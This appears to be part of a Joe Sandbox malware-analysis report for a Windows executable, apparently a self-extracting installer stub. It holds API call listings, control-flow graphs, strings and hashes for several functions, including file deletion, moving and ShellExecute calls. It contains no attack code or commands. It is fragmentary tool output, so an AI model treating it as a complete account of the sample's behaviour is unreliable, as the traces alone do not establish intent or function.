                                                                                              • Function 00321B83 - 00322125: entry block 321b83 calls GetModuleHandleW, blocks 321ba8 and 321bd9 call GetProcAddress; block 321e7f calls GetModuleFileNameW and CreateFileW, 321eaf SetFilePointer, 321ebd ReadFile, 321f28 CloseHandle; block 321f34 calls GetModuleFileNameW, 321f7d CompareStringW, blocks 321f9d and 321fd9 GetFileAttributesW; block 322093 calls AllocConsole, block 3220c8 calls GetCurrentProcessId, AttachConsole, GetStdHandle, WriteConsoleW, Sleep and FreeConsole, and block 322113 calls ExitProcess
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00321B9C
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00321BAE
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00321BDF
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00321E89
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00321EA3
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00321EB3
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,$M4,00000000), ref: 00321ED1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00321F29
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00321F3E
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,$M4,?,00000000,?,00000800), ref: 00321F92
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,$M4,00000800,?,00000000,?,00000800), ref: 00321FBC
                                                                                              • GetFileAttributesW.KERNEL32(?,?,M4,00000800), ref: 00321FF8
                                                                                                • Part of subcall function 00321B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00321B56
                                                                                                • Part of subcall function 00321B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0032063A,Crypt32.dll,00000000,003206B4,00000200,?,00320697,00000000,00000000,?), ref: 00321B78
                                                                                              • _swprintf.LIBCMT ref: 0032206A
                                                                                              • _swprintf.LIBCMT ref: 003220B6
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              • AllocConsole.KERNEL32 ref: 003220BE
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 003220C8
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 003220CF
                                                                                              • _wcslen.LIBCMT ref: 003220E4
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 003220F5
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 003220FC
                                                                                              • Sleep.KERNEL32(00002710), ref: 00322107
                                                                                              • FreeConsole.KERNEL32 ref: 0032210D
                                                                                              • ExitProcess.KERNEL32 ref: 00322115
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                              • String ID: $M4$$P4$$Q4$(N4$(R4$,O4$4Q4$<M4$<P4$@N4$DO4$DR4$DXGIDebug.dll$LQ4$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$XM4$XN4$\O4$\R4$`P4$dQ4$dwmapi.dll$kernel32$pM4$pN4$tO4$uxtheme.dll$xP4$xQ4$xR4$M4$N4
                                                                                              • API String ID: 1207345701-4108843577
                                                                                              • Opcode ID: 522bfc9f70282aab9cb35dddbe75712597b8bc3b2a542b44d5bca72b6283f49e
                                                                                              • Instruction ID: c950abe48a562f0f03cb4ff81d5d991b4096e6320df113ef39f7a96db4386ac1
                                                                                              • Opcode Fuzzy Hash: 522bfc9f70282aab9cb35dddbe75712597b8bc3b2a542b44d5bca72b6283f49e
                                                                                              • Instruction Fuzzy Hash: 40D1A1B9408794ABD733DF509949BDFBBECBB85704F40092DF2899E151CBB0A548CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0031ED90
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0031EDCC
                                                                                                • Part of subcall function 0031D6A7: _wcslen.LIBCMT ref: 0031D6AF
                                                                                                • Part of subcall function 00321907: _wcslen.LIBCMT ref: 0032190D
                                                                                                • Part of subcall function 00322ED2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0031CF18,00000000,?,?), ref: 00322EEE
                                                                                              • _wcslen.LIBCMT ref: 0031F109
                                                                                              • __fprintf_l.LIBCMT ref: 0031F23C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                              • API String ID: 566448164-801612888
                                                                                              • Opcode ID: 804b06d83274b04772aad2d66fbc3da8454e6e8d4bafda8f44d81636e0d2430d
                                                                                              • Instruction ID: 1a894141064539a44337ffe77a07d6e86ca273d735f38d155c3a0f364c0d112f
                                                                                              • Opcode Fuzzy Hash: 804b06d83274b04772aad2d66fbc3da8454e6e8d4bafda8f44d81636e0d2430d
                                                                                              • Instruction Fuzzy Hash: 5832D075900218AFCF2ADF68C881AEA77A9FF0C710F41456AF9069B291EB71DDC5CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0032C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0032C769
                                                                                                • Part of subcall function 0032C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032C77A
                                                                                                • Part of subcall function 0032C758: IsDialogMessageW.USER32(00020486,?), ref: 0032C78E
                                                                                                • Part of subcall function 0032C758: TranslateMessage.USER32(?), ref: 0032C79C
                                                                                                • Part of subcall function 0032C758: DispatchMessageW.USER32(?), ref: 0032C7A6
                                                                                              • GetDlgItem.USER32(00000068,00371CF0), ref: 0032E62D
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,0032C9A9,003460F0,00371CF0,00371CF0,00001000,?,00000000,?), ref: 0032E655
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0032E660
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,003445F4), ref: 0032E66E
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0032E684
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0032E69E
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0032E6E2
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0032E6F0
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0032E6FF
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0032E726
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,0034549C), ref: 0032E735
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: 1849a1ca69e3302fabc2bc0785c5fff31b43d8c02e9d2255a53deefda447a26d
                                                                                              • Instruction ID: eb9f788f01c17f5d4494047953326439fd3d87cc25c11b243faba542e041571c
                                                                                              • Opcode Fuzzy Hash: 1849a1ca69e3302fabc2bc0785c5fff31b43d8c02e9d2255a53deefda447a26d
                                                                                              • Instruction Fuzzy Hash: 883126B1145B40BFD713DF20EC0AFAF3FACFB42306F900918F5A1961A1C7A459058BA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0032E8FE
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 0032EA2E
                                                                                              • IsWindowVisible.USER32(?), ref: 0032EA61
                                                                                              • ShowWindow.USER32(?,00000000), ref: 0032EA6D
                                                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 0032EA7E
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0032EAA9
                                                                                              • CloseHandle.KERNEL32(?), ref: 0032EACF
                                                                                              • ShowWindow.USER32(?,00000001), ref: 0032EB31
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                                                                              • String ID: .exe$.inf$Ld4
                                                                                              • API String ID: 3646668279-4202968764
                                                                                              • Opcode ID: 15869eccb10596659f5c6e0434fd42e2f6a5b828c9df8d189278bc9a1d18c625
                                                                                              • Instruction ID: c1df1d29019202dcd5ae3a1bc47d214b2ec108b3225bbdf4596661e768f664a5
                                                                                              • Opcode Fuzzy Hash: 15869eccb10596659f5c6e0434fd42e2f6a5b828c9df8d189278bc9a1d18c625
                                                                                              • Instruction Fuzzy Hash: F05103314083A09ADB33DB64B846BAB7BE8BF41740F0A481EF5C597190EBB59884CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0032C92D,00000066), ref: 0032B6E5
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,0032C92D,00000066), ref: 0032B6FC
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,0032C92D,00000066), ref: 0032B713
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,0032C92D,00000066), ref: 0032B722
                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0032C92D,00000066), ref: 0032B73D
                                                                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0032C92D,00000066), ref: 0032B74E
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0032B7D6
                                                                                                • Part of subcall function 0032B636: GdipAlloc.GDIPLUS(00000010), ref: 0032B63C
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0032B7B7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0032B7DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 541704414-364855578
                                                                                              • Opcode ID: 97592da754835bbededcb0ede245b2d337bdf94149e5bcfce6239b8324f775ce
                                                                                              • Instruction ID: cf09d282528dc2c0a5aa48b073e0d0f9e6c992d69150febdec62abee16ae81fa
                                                                                              • Opcode Fuzzy Hash: 97592da754835bbededcb0ede245b2d337bdf94149e5bcfce6239b8324f775ce
                                                                                              • Instruction Fuzzy Hash: A6316175600712AFD7139F65EC88E1BBFACEF85791F060528F905D6261EF31E844CAA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 764 33bb1b-33bb34 765 33bb36-33bb46 call 34010c 764->765 766 33bb4a-33bb4f 764->766 765->766 773 33bb48 765->773 768 33bb51-33bb59 766->768 769 33bb5c-33bb80 MultiByteToWideChar 766->769 768->769 771 33bd13-33bd26 call 330d7c 769->771 772 33bb86-33bb92 769->772 774 33bbe6 772->774 775 33bb94-33bba5 772->775 773->766 777 33bbe8-33bbea 774->777 778 33bba7-33bbb6 call 3431d0 775->778 779 33bbc4-33bbd5 call 33a7fe 775->779 781 33bbf0-33bc03 MultiByteToWideChar 777->781 782 33bd08 777->782 778->782 792 33bbbc-33bbc2 778->792 779->782 789 33bbdb 779->789 781->782 786 33bc09-33bc1b call 33c12c 781->786 787 33bd0a-33bd11 call 33bd83 782->787 794 33bc20-33bc24 786->794 787->771 793 33bbe1-33bbe4 789->793 792->793 793->777 794->782 796 33bc2a-33bc31 794->796 797 33bc33-33bc38 796->797 798 33bc6b-33bc77 796->798 797->787 801 33bc3e-33bc40 797->801 799 33bcc3 798->799 800 33bc79-33bc8a 798->800 804 33bcc5-33bcc7 799->804 802 33bca5-33bcb6 call 33a7fe 800->802 803 33bc8c-33bc9b call 3431d0 800->803 801->782 805 33bc46-33bc60 call 33c12c 801->805 808 33bd01-33bd07 call 33bd83 802->808 818 33bcb8 802->818 803->808 816 33bc9d-33bca3 803->816 804->808 809 33bcc9-33bce2 call 33c12c 804->809 805->787 820 33bc66 805->820 808->782 809->808 821 33bce4-33bceb 809->821 822 33bcbe-33bcc1 816->822 818->822 820->782 823 33bd27-33bd2d 821->823 824 33bced-33bcee 821->824 822->804 825 33bcef-33bcff WideCharToMultiByte 823->825 824->825 825->808 826 33bd2f-33bd36 call 33bd83 825->826 826->787
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003369A3,003369A3,?,?,?,0033BD6C,00000001,00000001,62E85006), ref: 0033BB75
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0033BD6C,00000001,00000001,62E85006,?,?,?), ref: 0033BBFB
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0033BCF5
                                                                                              • __freea.LIBCMT ref: 0033BD02
                                                                                                • Part of subcall function 0033A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0033DBEC,00000000,?,003380B1,?,00000008,?,0033A871,?,?,?), ref: 0033A830
                                                                                              • __freea.LIBCMT ref: 0033BD0B
                                                                                              • __freea.LIBCMT ref: 0033BD30
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: f2077ea574f4ff2a16ed0bde7dd2c0b46eef421827e5f6589cca05d32c8315f0
                                                                                              • Instruction ID: 6939df570cc2a0b848c1ebeb7fab71e35349c880d2daf92354f2ed7ef550b3af
                                                                                              • Opcode Fuzzy Hash: f2077ea574f4ff2a16ed0bde7dd2c0b46eef421827e5f6589cca05d32c8315f0
                                                                                              • Instruction Fuzzy Hash: 9551D172610216ABEB268F64DCC2EBFB7A9EF44750F164629FE05DA150DB35EC80C690
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 829 32c324-32c342 GetCurrentProcess OpenProcessToken 830 32c3a7 829->830 831 32c344-32c35c GetTokenInformation 829->831 832 32c3a9-32c3ab 830->832 833 32c369-32c38a call 337566 GetTokenInformation 831->833 834 32c35e-32c367 GetLastError 831->834 837 32c39b-32c3a5 call 335219 833->837 838 32c38c-32c399 CopySid 833->838 834->830 834->833 837->832 838->837
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00020008,0032BF14,?,?,?,?,0032BF14,?), ref: 0032C333
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0032BF14,?), ref: 0032C33A
                                                                                              • GetTokenInformation.KERNELBASE(0032BF14,00000001(TokenIntegrityLevel),00000000,00000000,?,?,?,?,?,0032BF14,?), ref: 0032C354
                                                                                              • GetLastError.KERNEL32(?,?,?,?,0032BF14,?), ref: 0032C35E
                                                                                              • GetTokenInformation.KERNELBASE(0032BF14,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?,?,0032BF14,?), ref: 0032C382
                                                                                              • CopySid.ADVAPI32(00000044,0032BF14,00000000,?,?,?,?,?,0032BF14,?), ref: 0032C393
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Token$InformationProcess$CopyCurrentErrorLastOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3984476752-0
                                                                                              • Opcode ID: a17c7e14369b8c6ff36b877a478283c87c2c697509bb5d06f9745ef860890103
                                                                                              • Instruction ID: a8168a08f4d697a5ac4a8d6005a6c3cee3eed1235c2a11f4a41a4ee622b6165f
                                                                                              • Opcode Fuzzy Hash: a17c7e14369b8c6ff36b877a478283c87c2c697509bb5d06f9745ef860890103
                                                                                              • Instruction Fuzzy Hash: CB018076510218FFEB269BA0FC89EEEBB6DEF05340F104425F609D5050D6758E90AA60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 841 32ed8b-32eda4 WaitForSingleObject 842 32eda6-32eda7 841->842 843 32edec-32edee 841->843 844 32eda9-32edb9 PeekMessageW 842->844 845 32edbb-32edd6 GetMessageW TranslateMessage DispatchMessageW 844->845 846 32eddc-32ede9 WaitForSingleObject 844->846 845->846 846->844 847 32edeb 846->847 847->843
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0032ED97
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0032EDB1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032EDC2
                                                                                              • TranslateMessage.USER32(?), ref: 0032EDCC
                                                                                              • DispatchMessageW.USER32(?), ref: 0032EDD6
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0032EDE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 2148572870-0
                                                                                              • Opcode ID: 6720d8ffb9c12a6de53547f902a882a4ff44211fd3d9457c9ed5807851eb7f78
                                                                                              • Instruction ID: 6abb76a1d7dedb47ad965a27a89a027c3ddc4175fa15c8a129021ee5ad4a94b9
                                                                                              • Opcode Fuzzy Hash: 6720d8ffb9c12a6de53547f902a882a4ff44211fd3d9457c9ed5807851eb7f78
                                                                                              • Instruction Fuzzy Hash: 89F03776A01629ABCB326BA5EC4DECFBE6CEF42391F108421B60AD6050D6749595CBE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 848 32dfcc-32dfcf 849 32dfd5-32dffa GetTempPathW call 31caa0 848->849 850 32e14e-32e151 848->850 858 32dffe-32e02a call 314a20 call 31b4c1 849->858 852 32e157-32e15d 850->852 853 32e51e-32e549 call 32c504 850->853 855 32e169-32e170 852->855 856 32e15f 852->856 861 32d8d8-32d8e6 853->861 862 32e54f-32e55d 853->862 855->853 856->855 871 32dffc-32dffd 858->871 872 32e02c-32e043 SetDlgItemTextW 858->872 863 32d8e7-32d8fc call 32c11c 861->863 870 32d8fe 863->870 873 32d900-32d915 call 323316 870->873 871->858 872->853 874 32e049-32e04f 872->874 879 32d922-32d925 873->879 880 32d917-32d91b 873->880 874->853 876 32e055-32e070 call 3333ac 874->876 884 32e072-32e07e 876->884 885 32e0c0-32e0c7 876->885 879->853 883 32d92b 879->883 880->873 882 32d91d 880->882 882->853 888 32d932-32d935 883->888 889 32db03-32db05 883->889 890 32dbc1-32dbc3 883->890 891 32dba4-32dba6 883->891 884->885 892 32e080 884->892 886 32e0f9-32e129 call 32bea2 call 32b7f4 885->886 887 32e0c9-32e0f4 call 32192f * 2 885->887 886->853 925 32e12f-32e149 EndDialog 886->925 887->886 888->853 899 32d93b-32d995 call 32b65d call 31d200 call 31b93d call 31ba77 call 3179e5 888->899 889->853 897 32db0b-32db17 889->897 890->853 896 32dbc9-32dbd0 890->896 891->853 894 32dbac-32dbbc SetWindowTextW 891->894 893 32e083-32e087 892->893 900 32e09b-32e0b8 call 32192f 893->900 901 32e089-32e097 893->901 894->853 896->853 903 32dbd6-32dbef 896->903 904 32db2b-32db30 897->904 905 32db19-32db2a call 338a79 897->905 966 32dad4-32dae9 call 31b9ca 899->966 900->885 901->893 910 32e099 901->910 913 32dbf1 903->913 914 32dbf7-32dc05 call 334fa3 903->914 908 32db32-32db38 904->908 909 32db3a-32db45 call 32c67e 904->909 905->904 919 32db4a-32db4c 908->919 909->919 910->885 913->914 914->853 934 32dc0b-32dc14 914->934 928 32db57-32db77 call 334fa3 call 33521e 919->928 929 32db4e-32db55 call 334fa3 919->929 925->853 954 32db90-32db92 928->954 955 32db79-32db80 928->955 929->928 935 32dc16-32dc1a 934->935 936 32dc3d-32dc40 934->936 940 32dc46-32dc49 935->940 941 32dc1c-32dc24 935->941 936->940 943 32dd25-32dd33 call 32192f 936->943 948 32dc56-32dc71 940->948 949 32dc4b-32dc50 940->949 941->853 946 32dc2a-32dc38 call 32192f 941->946 956 32dd35-32dd49 call 3336be 943->956 946->956 967 32dc73-32dcad 948->967 968 32dcbb-32dcc2 948->968 949->943 949->948 954->853 957 32db98-32db9f call 335219 954->957 961 32db82-32db84 955->961 962 32db87-32db8f call 338a79 955->962 976 32dd56-32ddb0 call 32192f call 32c3ae GetDlgItem SetWindowTextW SendMessageW call 337306 956->976 977 32dd4b-32dd4f 956->977 957->853 961->962 962->954 983 32d99a-32d9ae SetFileAttributesW 966->983 984 32daef-32dafe call 31b953 966->984 994 32dcb1-32dcb3 967->994 995 32dcaf 967->995 970 32dcf0-32dd13 call 334fa3 * 2 968->970 971 32dcc4-32dcdc call 334fa3 968->971 970->956 1005 32dd15-32dd23 call 321907 970->1005 971->970 987 32dcde-32dceb call 321907 971->987 976->853 1016 32ddb6-32ddca SendMessageW 976->1016 977->976 982 32dd51-32dd53 977->982 982->976 989 32da54-32da64 GetFileAttributesW 983->989 990 32d9b4-32d9e7 call 31cdc0 call 31caa0 call 334fa3 983->990 984->853 987->970 989->966 1000 32da66-32da75 DeleteFileW 989->1000 1020 32d9fa-32da08 call 31d1c1 990->1020 1021 32d9e9-32d9f8 call 334fa3 990->1021 994->968 995->994 1000->966 1004 32da77-32da7a 1000->1004 1008 32da7e-32daaa call 314a20 GetFileAttributesW 1004->1008 1005->956 1017 32da7c-32da7d 1008->1017 1018 32daac-32dac2 MoveFileW 1008->1018 1016->853 1017->1008 1018->966 1022 32dac4-32dace MoveFileExW 1018->1022 1020->984 1027 32da0e-32da4e call 334fa3 call 3311b0 SHFileOperationW 1020->1027 1021->1020 1021->1027 1022->966 1027->989
                                                                                              APIs
